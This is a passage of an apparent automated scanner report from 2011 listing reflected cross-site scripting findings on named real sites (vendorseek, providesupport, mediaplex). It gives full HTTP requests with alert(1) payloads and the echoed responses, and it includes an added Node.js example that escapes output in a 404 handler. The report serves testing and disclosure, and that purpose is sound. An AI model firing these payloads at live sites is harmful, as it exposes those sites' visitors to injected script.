GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=47aa6"><script>alert(1)</script>17f7ae3a145&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:07 GMT
Connection: close
Set-Cookie: JSESSIONID=534417FF5679B259D78F3527F3B5F9FF.app6-all2; Path=/
Set-Cookie: JSESSIONID=AC3E67B01F08CE42EC4FAA382CAE04FE.app6-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:07 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033287262; Expires=Sat, 16-Feb-2019 12:48:07 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
ault&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=47aa6"><script>alert(1)</script>17f7ae3a145&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=1661102180
...[SNIP]...

3.21. http://forms.vendorseek.com/controller [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3f10"><script>alert(1)</script>4df01fa89ff was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=truec3f10"><script>alert(1)</script>4df01fa89ff&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:09 GMT
Connection: close
Set-Cookie: JSESSIONID=CE0040EAA12C8C817879FC115BC89A90.app6-all1; Path=/
Set-Cookie: JSESSIONID=B9D35294ACC0F93628BE2F3A67EAE738.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:09 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033289912; Expires=Sat, 16-Feb-2019 12:48:09 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
p://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=truec3f10"><script>alert(1)</script>4df01fa89ff&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=201235192036
...[SNIP]...

3.22. http://forms.vendorseek.com/controller [spage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the spage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac565"><script>alert(1)</script>dea5f51ae06 was submitted in the spage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=ac565"><script>alert(1)</script>dea5f51ae06&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:02 GMT
Connection: close
Set-Cookie: JSESSIONID=9BAE8A9D6F92A1B449A843C6BAE0AE52.app6-all1; Path=/
Set-Cookie: JSESSIONID=DC8610B9DC97ABB633D752123FC11C7C.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:02 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033282568; Expires=Sat, 16-Feb-2019 12:48:02 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
m/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=ac565"><script>alert(1)</script>dea5f51ae06&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc2
...[SNIP]...

3.23. http://forms.vendorseek.com/controller [tnum parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the tnum request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9d36"><script>alert(1)</script>fe8c1812c3f was submitted in the tnum parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1f9d36"><script>alert(1)</script>fe8c1812c3f&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:47:42 GMT
Connection: close
Set-Cookie: JSESSIONID=E3A83D033E10CFEBA392E0FA7676C378.app5-all2; Path=/
Set-Cookie: JSESSIONID=06A32FAF8D27AB0386D035C9A1780816.app5-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:47:42 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033262343; Expires=Sat, 16-Feb-2019 12:47:42 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
<Input Name="InternalLeadIFrameURL" Value="http://leadformone.quinstreet.com/controller?srvid=67110&ft=default&tnum=1f9d36"><script>alert(1)</script>fe8c1812c3f&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendor
...[SNIP]...

3.24. http://forms.vendorseek.com/controller [typage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the typage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee808"><script>alert(1)</script>8d9dbcd0750 was submitted in the typage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.aspee808"><script>alert(1)</script>8d9dbcd0750&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:01 GMT
Connection: close
Set-Cookie: JSESSIONID=6EE8FB9F2EFB6D605779F75A84C1C898.app5-all2; Path=/
Set-Cookie: JSESSIONID=16FA8362C193617FAA60E643F730515A.app5-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:01 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033281364; Expires=Sat, 16-Feb-2019 12:48:01 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
reet.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.aspee808"><script>alert(1)</script>8d9dbcd0750&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw5
...[SNIP]...

3.25. http://forms.vendorseek.com/controller [vkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the vkey request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57229"><script>alert(1)</script>143b0a15cd4 was submitted in the vkey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=57229"><script>alert(1)</script>143b0a15cd4&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:00 GMT
Connection: close
Set-Cookie: JSESSIONID=23A3EF2447CE3E44D7A9C9D624F699E7.app5-all1; Path=/
Set-Cookie: JSESSIONID=E77003C1A4071CC4D9B5561B5C808894.app5-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:00 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033280128; Expires=Sat, 16-Feb-2019 12:48:00 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
alLeadIFrameURL" Value="http://leadformone.quinstreet.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=57229"><script>alert(1)</script>143b0a15cd4&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=200997912
...[SNIP]...

3.26. http://image.providesupport.com/cmd/virtacore [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /cmd/virtacore

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a74f<script>alert(1)</script>ffd953b27d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmd6a74f<script>alert(1)</script>ffd953b27d2/virtacore?ps_t=1297999351117&ps_l=http%3A//www.powervps.com/&ps_r=&ps_s=EnEadSGx2lPF HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.powervps.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=EnEadSGx2lPF

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 18 Feb 2011 03:22:09 GMT
Content-Length: 534

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmd6a74f<script>alert(1)</script>ffd953b27d2/virtacore?ps_t=1297999351117&ps_l=http://www.powervps.com/&ps_r=&ps_s=EnEadSGx2lPF
</pre>
<!
...[SNIP]...

3.27. http://image.providesupport.com/js/virtacore/safe-monitor.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/virtacore/safe-monitor.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5d61<script>alert(1)</script>246a70dc7ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsc5d61<script>alert(1)</script>246a70dc7ef/virtacore/safe-monitor.js?ps_h=581W&ps_t=1297999351024 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.powervps.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 18 Feb 2011 03:22:07 GMT
Content-Length: 569

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /jsc5d61<script>alert(1)</script>246a70dc7ef/virtacore/safe-monitor.js?ps_h=581W&ps_t=1297999351024
</pre>
<!-- ==========================
...[SNIP]...

3.28. http://image.providesupport.com/js/virtacore/safe-monitor.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/virtacore/safe-monitor.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da0c0<a>e1423a3f174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/virtacoreda0c0<a>e1423a3f174/safe-monitor.js?ps_h=581W&ps_t=1297999466909 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.powervps.com/cpanel-plesk-vps.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=EnEadSGx2lPF

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 18 Feb 2011 03:24:04 GMT
Content-Length: 547

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/virtacoreda0c0<a>e1423a3f174/safe-monitor.js?ps_h=581W&ps_t=1297999466909
</pre>
<!-- ================================================
...[SNIP]...
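
Added example (not code from the report or from providesupport.com): a minimal Node.js imitation of the 404 handler behind issues 3.27 and 3.28, which echoes the raw request target inside the <pre> block, beside a hardened version that HTML-encodes it and declares its content type explicitly. The handler shape is an assumption; the two request targets are the scanner's payloads copied from the two requests above.

```javascript
// Added example, not code from the original report or from providesupport.com:
// a minimal imitation of the 404 handler seen in issues 3.27 and 3.28, which
// echoes the raw request target inside a <pre> block, beside a hardened
// version. The handler shape is an assumption; the two request targets are the
// scanner's payloads copied from the report.

// Encode the characters that change meaning in HTML text and attribute context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Shared page template; only what goes into `shownTarget` differs below.
function errorPage(label, shownTarget) {
  return '<html>\n<body>\n<h2>Error 404: Not Found</h2>\n<pre>\n' +
    label + ': ' + shownTarget + '\n</pre>\n</body>\n</html>\n';
}

// Vulnerable: the request target is concatenated into the markup unchanged,
// so a path segment containing <script> becomes a live element.
function render404Vulnerable(requestTarget) {
  return errorPage('File', requestTarget);
}

// Hardened: same page, untrusted data encoded for the HTML text context it
// lands in. Browsers render the entities back to the original characters, so
// the page still shows the offending path verbatim.
function render404Hardened(requestTarget) {
  return errorPage('File', escapeHtml(requestTarget));
}

// Full response for the hardened page. The status code is irrelevant to XSS:
// a 404 body served as text/html is parsed and executed like any other page,
// so the content type is declared with a charset and sniffing is disabled.
function build404Response(requestTarget) {
  return {
    status: 404,
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
      'Cache-Control': 'no-cache',
    },
    body: render404Hardened(requestTarget),
  };
}

// Request targets from issues 3.27 and 3.28 (scanner payloads from the report).
const TARGET_327 =
  '/jsc5d61<script>alert(1)</script>246a70dc7ef/virtacore/safe-monitor.js?ps_h=581W&ps_t=1297999351024';
const TARGET_328 =
  '/js/virtacoreda0c0<a>e1423a3f174/safe-monitor.js?ps_h=581W&ps_t=1297999466909';

// Cheap regression check: after encoding, the only '<' left in the body are
// those of the template itself.
function countTags(body) {
  return (body.match(/</g) || []).length;
}
const TEMPLATE_TAG_COUNT = countTags(errorPage('File', ''));
```

The check at the bottom is the kind of assertion worth keeping in a test suite for any error handler: render the page with a known hostile path and confirm the number of `<` characters equals the template's own, so a future change that drops the encoder fails the build rather than the next scan.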

3.29. http://img.mediaplex.com/content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d142"%3balert(1)//eee3dea5e8d was submitted in the mpck parameter. This input was echoed as 3d142";alert(1)//eee3dea5e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the string holds HTML markup (the anchor's href, followed by \" target=\"_blank\">), so the value sits in two contexts at once: the JavaScript string literal of the ad creative and the HTML attribute it later becomes. Because the creative is fetched with a <script src> tag, anything injected this way executes in the origin of whichever publisher page includes the script, not in that of img.mediaplex.com.

